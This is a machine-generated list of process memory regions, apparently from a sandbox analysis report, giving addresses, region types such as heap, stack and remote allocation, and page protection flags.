455C000
|
trusted library allocation
|
page read and write
|
||
58E0000
|
trusted library allocation
|
page read and write
|
||
63D493E000
|
stack
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
215E8AEA000
|
trusted library allocation
|
page read and write
|
||
29B1000
|
trusted library allocation
|
page read and write
|
||
68BF000
|
stack
|
page read and write
|
||
1407BF000
|
remote allocation
|
page execute and read and write
|
||
419B000
|
trusted library allocation
|
page read and write
|
||
2A8E000
|
stack
|
page read and write
|
||
5CE0000
|
heap
|
page read and write
|
||
2052F7D7000
|
heap
|
page read and write
|
||
BF5000
|
heap
|
page read and write
|
||
D7C000
|
heap
|
page read and write
|
||
296B415A000
|
trusted library allocation
|
page read and write
|
||
20541764000
|
trusted library allocation
|
page read and write
|
||
59C0000
|
trusted library allocation
|
page execute and read and write
|
||
2F37000
|
trusted library allocation
|
page read and write
|
||
21580050000
|
trusted library allocation
|
page read and write
|
||
DB40C78000
|
stack
|
page read and write
|
||
F98000
|
stack
|
page read and write
|
||
E3C000
|
stack
|
page read and write
|
||
296B3290000
|
trusted library allocation
|
page read and write
|
||
3554000
|
trusted library allocation
|
page read and write
|
||
154F5A61000
|
trusted library allocation
|
page read and write
|
||
3971000
|
trusted library allocation
|
page read and write
|
||
1A9469E8000
|
trusted library allocation
|
page read and write
|
||
296B4C48000
|
trusted library allocation
|
page read and write
|
||
2158018C000
|
heap
|
page read and write
|
||
5653000
|
heap
|
page read and write
|
||
296B3260000
|
heap
|
page read and write
|
||
6CC0000
|
trusted library allocation
|
page read and write
|
||
2C5C000
|
trusted library allocation
|
page read and write
|
||
20541BC1000
|
trusted library allocation
|
page read and write
|
||
7FF7C1160000
|
trusted library allocation
|
page read and write
|
||
4C9E000
|
stack
|
page read and write
|
||
215E76E6000
|
heap
|
page read and write
|
||
20541677000
|
trusted library allocation
|
page read and write
|
||
F9E000
|
stack
|
page read and write
|
||
58BB000
|
heap
|
page read and write
|
||
3977000
|
trusted library allocation
|
page read and write
|
||
2DFB000
|
trusted library allocation
|
page read and write
|
||
F38000
|
stack
|
page read and write
|
||
1A94664D000
|
trusted library allocation
|
page read and write
|
||
1A956D11000
|
trusted library allocation
|
page read and write
|
||
1066000
|
heap
|
page read and write
|
||
2B05000
|
trusted library allocation
|
page read and write
|
||
30A9000
|
trusted library allocation
|
page read and write
|
||
60D2000
|
heap
|
page read and write
|
||
215E8A31000
|
trusted library allocation
|
page read and write
|
||
5AB0000
|
trusted library allocation
|
page read and write
|
||
154E3E50000
|
heap
|
page read and write
|
||
1000000
|
heap
|
page execute and read and write
|
||
215E8903000
|
trusted library allocation
|
page read and write
|
||
286215C000
|
stack
|
page read and write
|
||
7FF7C0F4B000
|
trusted library allocation
|
page execute and read and write
|
||
1510000
|
heap
|
page read and write
|
||
13E3000
|
trusted library allocation
|
page execute and read and write
|
||
1470000
|
heap
|
page read and write
|
||
20541633000
|
trusted library allocation
|
page read and write
|
||
5570000
|
trusted library allocation
|
page read and write
|
||
6BA0000
|
trusted library allocation
|
page read and write
|
||
A837FE000
|
stack
|
page read and write
|
||
578E000
|
stack
|
page read and write
|
||
2F6B000
|
trusted library allocation
|
page read and write
|
||
2DDA000
|
trusted library allocation
|
page read and write
|
||
154FE186000
|
heap
|
page read and write
|
||
C7331E1000
|
stack
|
page read and write
|
||
215E766B000
|
heap
|
page read and write
|
||
1A956A92000
|
trusted library allocation
|
page read and write
|
||
54FE000
|
stack
|
page read and write
|
||
2941000
|
trusted library allocation
|
page read and write
|
||
B3E000
|
stack
|
page read and write
|
||
3110000
|
trusted library allocation
|
page read and write
|
||
28629FF000
|
stack
|
page read and write
|
||
D8D69ED000
|
stack
|
page read and write
|
||
326A000
|
trusted library allocation
|
page read and write
|
||
2C52000
|
trusted library allocation
|
page read and write
|
||
2D93000
|
trusted library allocation
|
page read and write
|
||
573E000
|
stack
|
page read and write
|
||
1A944950000
|
heap
|
page read and write
|
||
296B33E1000
|
trusted library allocation
|
page read and write
|
||
1404E9000
|
remote allocation
|
page execute and read and write
|
||
7FF7C1178000
|
trusted library allocation
|
page read and write
|
||
6CE4000
|
trusted library allocation
|
page read and write
|
||
27640965000
|
trusted library allocation
|
page read and write
|
||
1632000
|
trusted library allocation
|
page read and write
|
||
54C0000
|
trusted library allocation
|
page read and write
|
||
2E31FFF000
|
stack
|
page read and write
|
||
B9B000
|
trusted library allocation
|
page execute and read and write
|
||
12D4000
|
heap
|
page read and write
|
||
1A95689D000
|
trusted library allocation
|
page read and write
|
||
4471000
|
trusted library allocation
|
page read and write
|
||
2052F9E5000
|
heap
|
page read and write
|
||
16F6000
|
heap
|
page read and write
|
||
205319B5000
|
trusted library allocation
|
page read and write
|
||
30F4000
|
trusted library allocation
|
page read and write
|
||
205316C9000
|
trusted library allocation
|
page read and write
|
||
29A71C10000
|
unkown
|
page readonly
|
||
1404CF000
|
remote allocation
|
page execute and read and write
|
||
29B5000
|
trusted library allocation
|
page read and write
|
||
215E83DE000
|
trusted library allocation
|
page read and write
|
||
296B2DF5000
|
heap
|
page read and write
|
||
29A71DCC000
|
heap
|
page read and write
|
||
154E3F22000
|
heap
|
page read and write
|
||
3100000
|
trusted library allocation
|
page execute and read and write
|
||
154E3EB5000
|
heap
|
page read and write
|
||
63D45FA000
|
stack
|
page read and write
|
||
519E000
|
stack
|
page read and write
|
||
2AD0000
|
trusted library allocation
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
BB5000
|
heap
|
page read and write
|
||
568D000
|
heap
|
page read and write
|
||
305C000
|
stack
|
page read and write
|
||
1597000
|
heap
|
page read and write
|
||
A833FD000
|
stack
|
page read and write
|
||
1A956833000
|
trusted library allocation
|
page read and write
|
||
1A9568C5000
|
trusted library allocation
|
page read and write
|
||
215E6EE0000
|
heap
|
page read and write
|
||
2763F649000
|
heap
|
page read and write
|
||
14E0000
|
heap
|
page read and write
|
||
59A0000
|
trusted library allocation
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
2F88000
|
trusted library allocation
|
page read and write
|
||
58B0000
|
trusted library allocation
|
page read and write
|
||
2B56000
|
trusted library allocation
|
page read and write
|
||
1B804890000
|
trusted library allocation
|
page read and write
|
||
60ED000
|
heap
|
page read and write
|
||
1407A1000
|
remote allocation
|
page execute and read and write
|
||
1406000
|
trusted library allocation
|
page execute and read and write
|
||
F8E000
|
trusted library allocation
|
page read and write
|
||
205416AA000
|
trusted library allocation
|
page read and write
|
||
2E31BFE000
|
stack
|
page read and write
|
||
5FE5000
|
heap
|
page read and write
|
||
E1A8B82000
|
stack
|
page read and write
|
||
BAC000
|
stack
|
page read and write
|
||
1A944A0C000
|
heap
|
page read and write
|
||
2F70000
|
trusted library allocation
|
page read and write
|
||
215E87E4000
|
trusted library allocation
|
page read and write
|
||
20541663000
|
trusted library allocation
|
page read and write
|
||
28BDBEC000
|
stack
|
page read and write
|
||
20541739000
|
trusted library allocation
|
page read and write
|
||
3486000
|
trusted library allocation
|
page read and write
|
||
3221000
|
trusted library allocation
|
page read and write
|
||
3242000
|
trusted library allocation
|
page read and write
|
||
296B2C2E000
|
heap
|
page read and write
|
||
5EDF000
|
heap
|
page read and write
|
||
74C0000
|
trusted library allocation
|
page read and write
|
||
215E6E60000
|
trusted library allocation
|
page read and write
|
||
129F000
|
heap
|
page read and write
|
||
44D1000
|
trusted library allocation
|
page read and write
|
||
1A946A47000
|
trusted library allocation
|
page read and write
|
||
59E0000
|
trusted library allocation
|
page read and write
|
||
215E74AC000
|
heap
|
page read and write
|
||
29A71E2A000
|
heap
|
page read and write
|
||
20541792000
|
trusted library allocation
|
page read and write
|
||
20541BE8000
|
trusted library allocation
|
page read and write
|
||
5E9A000
|
heap
|
page read and write
|
||
2740D660000
|
heap
|
page read and write
|
||
20531680000
|
trusted library allocation
|
page read and write
|
||
DB40AFE000
|
stack
|
page read and write
|
||
F90000
|
trusted library allocation
|
page read and write
|
||
1A9467F0000
|
trusted library allocation
|
page read and write
|
||
54BD000
|
stack
|
page read and write
|
||
2763F640000
|
heap
|
page read and write
|
||
41F2000
|
trusted library allocation
|
page read and write
|
||
7FF7C11E0000
|
trusted library allocation
|
page read and write
|
||
2054191D000
|
trusted library allocation
|
page read and write
|
||
7FF4B94A0000
|
trusted library allocation
|
page execute and read and write
|
||
DB40D7A000
|
stack
|
page read and write
|
||
2F35000
|
trusted library allocation
|
page read and write
|
||
2F4A000
|
trusted library allocation
|
page read and write
|
||
E1AA14C000
|
stack
|
page read and write
|
||
1404C9000
|
remote allocation
|
page execute and read and write
|
||
205417FB000
|
trusted library allocation
|
page read and write
|
||
2158014B000
|
heap
|
page read and write
|
||
215E8F62000
|
trusted library allocation
|
page read and write
|
||
2E317FF000
|
stack
|
page read and write
|
||
3334000
|
trusted library allocation
|
page read and write
|
||
C734DFE000
|
stack
|
page read and write
|
||
53BE000
|
stack
|
page read and write
|
||
2053154C000
|
trusted library allocation
|
page read and write
|
||
7FF7C1150000
|
trusted library allocation
|
page read and write
|
||
5C40000
|
trusted library allocation
|
page read and write
|
||
296B2C38000
|
heap
|
page read and write
|
||
2BCD000
|
trusted library allocation
|
page read and write
|
||
E9C000
|
stack
|
page read and write
|
||
564F000
|
stack
|
page read and write
|
||
1A9467BD000
|
trusted library allocation
|
page read and write
|
||
20541A15000
|
trusted library allocation
|
page read and write
|
||
215E7620000
|
heap
|
page read and write
|
||
85330FC000
|
stack
|
page read and write
|
||
BBE000
|
stack
|
page read and write
|
||
29B9000
|
trusted library allocation
|
page read and write
|
||
2D89000
|
trusted library allocation
|
page read and write
|
||
F8B000
|
trusted library allocation
|
page read and write
|
||
323B000
|
trusted library allocation
|
page read and write
|
||
2E4B000
|
trusted library allocation
|
page read and write
|
||
10D3000
|
heap
|
page read and write
|
||
CB0000
|
trusted library allocation
|
page read and write
|
||
571E000
|
stack
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page read and write
|
||
1A946920000
|
trusted library allocation
|
page read and write
|
||
7FF7C1240000
|
trusted library allocation
|
page read and write
|
||
215E7030000
|
heap
|
page read and write
|
||
205317B6000
|
trusted library allocation
|
page read and write
|
||
5D59000
|
heap
|
page read and write
|
||
2AA0000
|
trusted library allocation
|
page read and write
|
||
34C1000
|
trusted library allocation
|
page read and write
|
||
1A94670D000
|
trusted library allocation
|
page read and write
|
||
441C000
|
trusted library allocation
|
page read and write
|
||
2054198B000
|
trusted library allocation
|
page read and write
|
||
E1A9378000
|
stack
|
page read and write
|
||
B73000
|
trusted library allocation
|
page read and write
|
||
1A944BBB000
|
heap
|
page read and write
|
||
1660000
|
heap
|
page read and write
|
||
29A0060A000
|
trusted library allocation
|
page read and write
|
||
1436000
|
heap
|
page read and write
|
||
B7E000
|
stack
|
page read and write
|
||
F42000
|
trusted library allocation
|
page read and write
|
||
309D000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F44000
|
trusted library allocation
|
page read and write
|
||
2C56000
|
trusted library allocation
|
page read and write
|
||
D54000
|
heap
|
page read and write
|
||
296B3360000
|
trusted library allocation
|
page read and write
|
||
215801DB000
|
heap
|
page read and write
|
||
2AB3000
|
trusted library allocation
|
page read and write
|
||
54F0000
|
trusted library allocation
|
page read and write
|
||
30D7000
|
trusted library allocation
|
page read and write
|
||
4757000
|
trusted library allocation
|
page read and write
|
||
27640139000
|
trusted library allocation
|
page read and write
|
||
5740000
|
trusted library allocation
|
page read and write
|
||
C733DFF000
|
stack
|
page read and write
|
||
2052FA70000
|
heap
|
page read and write
|
||
6192000
|
heap
|
page read and write
|
||
2FDC000
|
trusted library allocation
|
page read and write
|
||
154FE220000
|
heap
|
page execute and read and write
|
||
2C24000
|
trusted library allocation
|
page read and write
|
||
1404D7000
|
remote allocation
|
page execute and read and write
|
||
29F2000
|
trusted library allocation
|
page read and write
|
||
2C58000
|
trusted library allocation
|
page read and write
|
||
2EC0000
|
trusted library allocation
|
page read and write
|
||
CA0000
|
trusted library allocation
|
page read and write
|
||
2054185F000
|
trusted library allocation
|
page read and write
|
||
5F3C000
|
heap
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
5859000
|
trusted library allocation
|
page read and write
|
||
F57000
|
trusted library allocation
|
page execute and read and write
|
||
5AE0000
|
trusted library allocation
|
page read and write
|
||
1450000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page execute and read and write
|
||
1600000
|
trusted library allocation
|
page read and write
|
||
5A30000
|
trusted library allocation
|
page execute and read and write
|
||
7D0000
|
heap
|
page read and write
|
||
13F3000
|
trusted library allocation
|
page read and write
|
||
1A956CD7000
|
trusted library allocation
|
page read and write
|
||
2054199D000
|
trusted library allocation
|
page read and write
|
||
1A94661D000
|
trusted library allocation
|
page read and write
|
||
29A71C12000
|
unkown
|
page readonly
|
||
60E6000
|
heap
|
page read and write
|
||
CD0000
|
trusted library allocation
|
page read and write
|
||
215801E7000
|
heap
|
page read and write
|
||
7FF7C0FE0000
|
trusted library allocation
|
page execute and read and write
|
||
14D9000
|
heap
|
page read and write
|
||
2A90000
|
trusted library allocation
|
page read and write
|
||
11B0000
|
heap
|
page read and write
|
||
154E4120000
|
heap
|
page read and write
|
||
29A73B90000
|
trusted library allocation
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
1630000
|
trusted library allocation
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
63D4273000
|
stack
|
page read and write
|
||
27640B18000
|
trusted library allocation
|
page read and write
|
||
5F40000
|
trusted library allocation
|
page read and write
|
||
5EFC000
|
heap
|
page read and write
|
||
12D5280B000
|
heap
|
page read and write
|
||
5820000
|
heap
|
page read and write
|
||
63D568D000
|
stack
|
page read and write
|
||
D20000
|
heap
|
page read and write
|
||
296B3462000
|
trusted library allocation
|
page read and write
|
||
2DED000
|
trusted library allocation
|
page read and write
|
||
2D76000
|
trusted library allocation
|
page read and write
|
||
2BB5000
|
trusted library allocation
|
page read and write
|
||
296B42D1000
|
trusted library allocation
|
page read and write
|
||
2740F145000
|
heap
|
page read and write
|
||
2B50000
|
trusted library allocation
|
page read and write
|
||
29A74720000
|
heap
|
page read and write
|
||
14B0000
|
heap
|
page read and write
|
||
D10000
|
trusted library allocation
|
page execute and read and write
|
||
7FD70000
|
trusted library allocation
|
page execute and read and write
|
||
29EF000
|
trusted library allocation
|
page read and write
|
||
2E323FC000
|
stack
|
page read and write
|
||
1A94694D000
|
trusted library allocation
|
page read and write
|
||
1B8046EA000
|
heap
|
page read and write
|
||
D2E000
|
heap
|
page read and write
|
||
561E000
|
stack
|
page read and write
|
||
B8A000
|
trusted library allocation
|
page execute and read and write
|
||
C7341FC000
|
stack
|
page read and write
|
||
215E7010000
|
trusted library allocation
|
page read and write
|
||
2763FD80000
|
trusted library allocation
|
page read and write
|
||
1A956C57000
|
trusted library allocation
|
page read and write
|
||
7FF7C10D0000
|
trusted library allocation
|
page execute and read and write
|
||
D8D91FE000
|
stack
|
page read and write
|
||
5BFE000
|
stack
|
page read and write
|
||
B86000
|
trusted library allocation
|
page execute and read and write
|
||
E1A907F000
|
stack
|
page read and write
|
||
5670000
|
trusted library allocation
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
296B3609000
|
trusted library allocation
|
page read and write
|
||
154F5CFE000
|
trusted library allocation
|
page read and write
|
||
7FF7C113B000
|
trusted library allocation
|
page read and write
|
||
11D9000
|
heap
|
page read and write
|
||
5580000
|
trusted library allocation
|
page read and write
|
||
205319D8000
|
trusted library allocation
|
page read and write
|
||
2B7E000
|
trusted library allocation
|
page read and write
|
||
14F0000
|
heap
|
page read and write
|
||
29A10021000
|
trusted library allocation
|
page read and write
|
||
56FF000
|
stack
|
page read and write
|
||
577D000
|
trusted library allocation
|
page read and write
|
||
7640000
|
trusted library allocation
|
page execute and read and write
|
||
1B806371000
|
trusted library allocation
|
page read and write
|
||
5890000
|
trusted library allocation
|
page read and write
|
||
DB41BCC000
|
stack
|
page read and write
|
||
58F0000
|
trusted library allocation
|
page execute and read and write
|
||
5540000
|
trusted library allocation
|
page read and write
|
||
5AA0000
|
trusted library allocation
|
page read and write
|
||
154E4155000
|
heap
|
page read and write
|
||
18E0000
|
trusted library allocation
|
page read and write
|
||
2B0B000
|
trusted library allocation
|
page read and write
|
||
30EC000
|
trusted library allocation
|
page read and write
|
||
140490000
|
remote allocation
|
page execute and read and write
|
||
6072000
|
heap
|
page read and write
|
||
21580183000
|
heap
|
page read and write
|
||
7FF7C0F23000
|
trusted library allocation
|
page execute and read and write
|
||
5B7E000
|
stack
|
page read and write
|
||
63D49BF000
|
stack
|
page read and write
|
||
215E6DB0000
|
heap
|
page read and write
|
||
FD9000
|
trusted library allocation
|
page read and write
|
||
A82BFF000
|
stack
|
page read and write
|
||
5E7E000
|
heap
|
page read and write
|
||
296B4397000
|
trusted library allocation
|
page read and write
|
||
12D526F5000
|
heap
|
page read and write
|
||
A82FFE000
|
stack
|
page read and write
|
||
3214000
|
trusted library allocation
|
page read and write
|
||
205418B7000
|
trusted library allocation
|
page read and write
|
||
296B32E0000
|
trusted library allocation
|
page read and write
|
||
2E91000
|
trusted library allocation
|
page read and write
|
||
53DF000
|
stack
|
page read and write
|
||
433A000
|
trusted library allocation
|
page read and write
|
||
59F0000
|
trusted library allocation
|
page read and write
|
||
2B1C000
|
trusted library allocation
|
page read and write
|
||
28BEBFF000
|
stack
|
page read and write
|
||
B3E000
|
stack
|
page read and write
|
||
1660000
|
trusted library allocation
|
page execute and read and write
|
||
12D52610000
|
direct allocation
|
page execute and read and write
|
||
D8D95FD000
|
stack
|
page read and write
|
||
29A73A5E000
|
heap
|
page read and write
|
||
1A956AAF000
|
trusted library allocation
|
page read and write
|
||
2D87000
|
trusted library allocation
|
page read and write
|
||
327D000
|
trusted library allocation
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
2C61000
|
trusted library allocation
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
2DC6000
|
trusted library allocation
|
page read and write
|
||
5BBE000
|
stack
|
page read and write
|
||
205316A7000
|
trusted library allocation
|
page read and write
|
||
1A946728000
|
trusted library allocation
|
page read and write
|
||
2053199A000
|
trusted library allocation
|
page read and write
|
||
215E906E000
|
trusted library allocation
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
1A946864000
|
trusted library allocation
|
page read and write
|
||
5A90000
|
trusted library allocation
|
page read and write
|
||
15E0000
|
trusted library allocation
|
page read and write
|
||
13D0000
|
trusted library allocation
|
page read and write
|
||
2763FF11000
|
trusted library allocation
|
page read and write
|
||
29A73B60000
|
trusted library allocation
|
page read and write
|
||
2F6E000
|
stack
|
page read and write
|
||
215E7701000
|
heap
|
page read and write
|
||
1A956947000
|
trusted library allocation
|
page read and write
|
||
2053197A000
|
trusted library allocation
|
page read and write
|
||
1A956ADD000
|
trusted library allocation
|
page read and write
|
||
29B7000
|
trusted library allocation
|
page read and write
|
||
F4A000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7C0FD6000
|
trusted library allocation
|
page read and write
|
||
DB40FFB000
|
stack
|
page read and write
|
||
2E9C000
|
stack
|
page read and write
|
||
63D437E000
|
stack
|
page read and write
|
||
1B8046C0000
|
heap
|
page read and write
|
||
4A1E000
|
stack
|
page read and write
|
||
5D89000
|
heap
|
page read and write
|
||
296B3280000
|
trusted library section
|
page read and write
|
||
2740D620000
|
heap
|
page read and write
|
||
2E70000
|
trusted library allocation
|
page read and write
|
||
4FAE000
|
stack
|
page read and write
|
||
29CA000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library section
|
page read and write
|
||
4A00000
|
trusted library allocation
|
page read and write
|
||
1A946AF7000
|
trusted library allocation
|
page read and write
|
||
215E77E1000
|
trusted library allocation
|
page read and write
|
||
2FD7000
|
trusted library allocation
|
page read and write
|
||
D17000
|
heap
|
page read and write
|
||
1A956BE8000
|
trusted library allocation
|
page read and write
|
||
1A9469D4000
|
trusted library allocation
|
page read and write
|
||
1A946A8C000
|
trusted library allocation
|
page read and write
|
||
2DC3000
|
trusted library allocation
|
page read and write
|
||
1A956BE3000
|
trusted library allocation
|
page read and write
|
||
63D558A000
|
stack
|
page read and write
|
||
296B2DF0000
|
heap
|
page read and write
|
||
6450000
|
trusted library allocation
|
page execute and read and write
|
||
20541B32000
|
trusted library allocation
|
page read and write
|
||
34D6000
|
trusted library allocation
|
page read and write
|
||
335A000
|
trusted library allocation
|
page read and write
|
||
CA4000
|
heap
|
page read and write
|
||
2763F8FA000
|
heap
|
page read and write
|
||
14079F000
|
remote allocation
|
page execute and read and write
|
||
2F7C000
|
trusted library allocation
|
page read and write
|
||
215E912F000
|
trusted library allocation
|
page read and write
|
||
1A9466DA000
|
trusted library allocation
|
page read and write
|
||
30A7000
|
trusted library allocation
|
page read and write
|
||
FB5000
|
trusted library allocation
|
page read and write
|
||
15F0000
|
trusted library allocation
|
page read and write
|
||
29D6000
|
trusted library allocation
|
page read and write
|
||
D8D75FE000
|
stack
|
page read and write
|
||
5530000
|
trusted library allocation
|
page read and write
|
||
20541751000
|
trusted library allocation
|
page read and write
|
||
1A946885000
|
trusted library allocation
|
page read and write
|
||
29A101B1000
|
trusted library allocation
|
page read and write
|
||
2E00000
|
trusted library allocation
|
page read and write
|
||
14F8000
|
trusted library allocation
|
page read and write
|
||
154E5A61000
|
trusted library allocation
|
page read and write
|
||
57C0000
|
trusted library allocation
|
page execute and read and write
|
||
2052F9EE000
|
heap
|
page read and write
|
||
4EEE000
|
stack
|
page read and write
|
||
5680000
|
trusted library allocation
|
page read and write
|
||
5EBA000
|
trusted library section
|
page read and write
|
||
215E768A000
|
heap
|
page read and write
|
||
21580214000
|
heap
|
page read and write
|
||
1650000
|
trusted library allocation
|
page read and write
|
||
157F000
|
stack
|
page read and write
|
||
51B0000
|
trusted library allocation
|
page read and write
|
||
CE2000
|
trusted library allocation
|
page read and write
|
||
58FE000
|
stack
|
page read and write
|
||
20541821000
|
trusted library allocation
|
page read and write
|
||
20531794000
|
trusted library allocation
|
page read and write
|
||
1B81637E000
|
trusted library allocation
|
page read and write
|
||
215E766D000
|
heap
|
page read and write
|
||
2DA2000
|
trusted library allocation
|
page read and write
|
||
5A98000
|
trusted library allocation
|
page read and write
|
||
5910000
|
trusted library allocation
|
page read and write
|
||
2FF0000
|
trusted library allocation
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
7FF7C1220000
|
trusted library allocation
|
page read and write
|
||
5D94000
|
heap
|
page read and write
|
||
215E877A000
|
trusted library allocation
|
page read and write
|
||
2054174C000
|
trusted library allocation
|
page read and write
|
||
5EAC000
|
heap
|
page read and write
|
||
2763F6C6000
|
heap
|
page read and write
|
||
5ED5000
|
heap
|
page read and write
|
||
7FF7C0FD0000
|
trusted library allocation
|
page read and write
|
||
296B2BF0000
|
heap
|
page read and write
|
||
20541565000
|
trusted library allocation
|
page read and write
|
||
2A01000
|
trusted library allocation
|
page read and write
|
||
2EAC000
|
heap
|
page read and write
|
||
205416D9000
|
trusted library allocation
|
page read and write
|
||
126E000
|
heap
|
page read and write
|
||
5EF5000
|
heap
|
page read and write
|
||
20531597000
|
trusted library allocation
|
page read and write
|
||
29A00001000
|
trusted library allocation
|
page read and write
|
||
1603000
|
trusted library allocation
|
page execute and read and write
|
||
4815000
|
trusted library allocation
|
page read and write
|
||
1B804630000
|
heap
|
page read and write
|
||
1A95678F000
|
trusted library allocation
|
page read and write
|
||
1A956C83000
|
trusted library allocation
|
page read and write
|
||
7FF7C1026000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7C1210000
|
trusted library allocation
|
page read and write
|
||
215801BA000
|
heap
|
page read and write
|
||
1404F4000
|
remote allocation
|
page execute and read and write
|
||
5850000
|
trusted library allocation
|
page read and write
|
||
154E4050000
|
heap
|
page read and write
|
||
5D5F000
|
heap
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
13F3000
|
trusted library allocation
|
page execute and read and write
|
||
15C0000
|
trusted library allocation
|
page read and write
|
||
5C50000
|
trusted library allocation
|
page read and write
|
||
296B441B000
|
trusted library allocation
|
page read and write
|
||
12D50C86000
|
heap
|
page read and write
|
||
1A9568D3000
|
trusted library allocation
|
page read and write
|
||
5A20000
|
trusted library allocation
|
page execute and read and write
|
||
20541683000
|
trusted library allocation
|
page read and write
|
||
3351000
|
trusted library allocation
|
page read and write
|
||
2053166D000
|
trusted library allocation
|
page read and write
|
||
1616000
|
trusted library allocation
|
page execute and read and write
|
||
1A946788000
|
trusted library allocation
|
page read and write
|
||
2921000
|
trusted library allocation
|
page read and write
|
||
2DBF000
|
trusted library allocation
|
page read and write
|
||
1A944BBE000
|
heap
|
page read and write
|
||
5EF1000
|
heap
|
page read and write
|
||
2052F7EB000
|
heap
|
page read and write
|
||
296B33D0000
|
heap
|
page read and write
|
||
F23000
|
trusted library allocation
|
page execute and read and write
|
||
445B000
|
trusted library allocation
|
page read and write
|
||
1A956A08000
|
trusted library allocation
|
page read and write
|
||
2DAA000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
3237000
|
trusted library allocation
|
page read and write
|
||
205417B7000
|
trusted library allocation
|
page read and write
|
||
B76000
|
trusted library allocation
|
page read and write
|
||
215801D5000
|
heap
|
page read and write
|
||
1A9469DB000
|
trusted library allocation
|
page read and write
|
||
2053163F000
|
trusted library allocation
|
page read and write
|
||
1A946667000
|
trusted library allocation
|
page read and write
|
||
2C98000
|
trusted library allocation
|
page read and write
|
||
1A956D4F000
|
trusted library allocation
|
page read and write
|
||
14BD000
|
heap
|
page read and write
|
||
1580000
|
trusted library allocation
|
page read and write
|
||
2053177D000
|
trusted library allocation
|
page read and write
|
||
29A71E97000
|
heap
|
page read and write
|
||
29A71DB0000
|
heap
|
page read and write
|
||
13FD000
|
trusted library allocation
|
page execute and read and write
|
||
14A0000
|
heap
|
page read and write
|
||
3180000
|
heap
|
page execute and read and write
|
||
3191000
|
trusted library allocation
|
page read and write
|
||
2F2E000
|
stack
|
page read and write
|
||
5F7E000
|
stack
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
154E5A72000
|
trusted library allocation
|
page read and write
|
||
21580150000
|
heap
|
page read and write
|
||
162B000
|
trusted library allocation
|
page execute and read and write
|
||
5660000
|
trusted library allocation
|
page read and write
|
||
2FBE000
|
trusted library allocation
|
page read and write
|
||
54B0000
|
trusted library allocation
|
page execute and read and write
|
||
1407A3000
|
remote allocation
|
page execute and read and write
|
||
296B2DE0000
|
trusted library section
|
page read and write
|
||
3931000
|
trusted library allocation
|
page read and write
|
||
1A95683D000
|
trusted library allocation
|
page read and write
|
||
215E6CD0000
|
heap
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
DB41C4D000
|
stack
|
page read and write
|
||
1A9466A2000
|
trusted library allocation
|
page read and write
|
||
20531721000
|
trusted library allocation
|
page read and write
|
||
5FF0000
|
heap
|
page read and write
|
||
5880000
|
trusted library allocation
|
page read and write
|
||
1400000
|
heap
|
page read and write
|
||
20541889000
|
trusted library allocation
|
page read and write
|
||
1A956CE5000
|
trusted library allocation
|
page read and write
|
||
154F5DF2000
|
trusted library allocation
|
page read and write
|
||
29A73950000
|
heap
|
page read and write
|
||
20541BE2000
|
trusted library allocation
|
page read and write
|
||
1A944BB0000
|
heap
|
page read and write
|
||
7F310000
|
trusted library allocation
|
page execute and read and write
|
||
215E6F07000
|
heap
|
page read and write
|
||
3DF0000
|
trusted library allocation
|
page read and write
|
||
20541991000
|
trusted library allocation
|
page read and write
|
||
29EB000
|
trusted library allocation
|
page read and write
|
||
5610000
|
heap
|
page read and write
|
||
5960000
|
trusted library allocation
|
page read and write
|
||
1A956892000
|
trusted library allocation
|
page read and write
|
||
1A9569B0000
|
trusted library allocation
|
page read and write
|
||
3927000
|
trusted library allocation
|
page read and write
|
||
174A000
|
heap
|
page read and write
|
||
1404DB000
|
remote allocation
|
page execute and read and write
|
||
101F000
|
stack
|
page read and write
|
||
3256000
|
trusted library allocation
|
page read and write
|
||
60CA000
|
heap
|
page read and write
|
||
68FE000
|
stack
|
page read and write
|
||
1A956B0A000
|
trusted library allocation
|
page read and write
|
||
5C20000
|
trusted library allocation
|
page read and write
|
||
515E000
|
stack
|
page read and write
|
||
5990000
|
trusted library allocation
|
page read and write
|
||
4DF0000
|
heap
|
page execute and read and write
|
||
1752000
|
heap
|
page read and write
|
||
2F87000
|
trusted library allocation
|
page read and write
|
||
DB40BFD000
|
stack
|
page read and write
|
||
4555000
|
trusted library allocation
|
page read and write
|
||
3150000
|
heap
|
page execute and read and write
|
||
29BB000
|
trusted library allocation
|
page read and write
|
||
2C3D000
|
trusted library allocation
|
page read and write
|
||
1A946ADC000
|
trusted library allocation
|
page read and write
|
||
52CE000
|
stack
|
page read and write
|
||
5F4E000
|
stack
|
page read and write
|
||
2763FF8C000
|
trusted library allocation
|
page read and write
|
||
2C0B000
|
trusted library allocation
|
page read and write
|
||
5F85000
|
heap
|
page read and write
|
||
57B0000
|
trusted library allocation
|
page read and write
|
||
140468000
|
remote allocation
|
page execute and read and write
|
||
7FF7C0F43000
|
trusted library allocation
|
page execute and read and write
|
||
205319C3000
|
trusted library allocation
|
page read and write
|
||
1A956A75000
|
trusted library allocation
|
page read and write
|
||
5F41000
|
heap
|
page read and write
|
||
D8D85FD000
|
stack
|
page read and write
|
||
5F60000
|
trusted library allocation
|
page read and write
|
||
15A0000
|
trusted library allocation
|
page read and write
|
||
5D52000
|
heap
|
page read and write
|
||
1140000
|
trusted library allocation
|
page read and write
|
||
30F6000
|
trusted library allocation
|
page read and write
|
||
DB41ACC000
|
stack
|
page read and write
|
||
1A94682C000
|
trusted library allocation
|
page read and write
|
||
2763F6C9000
|
heap
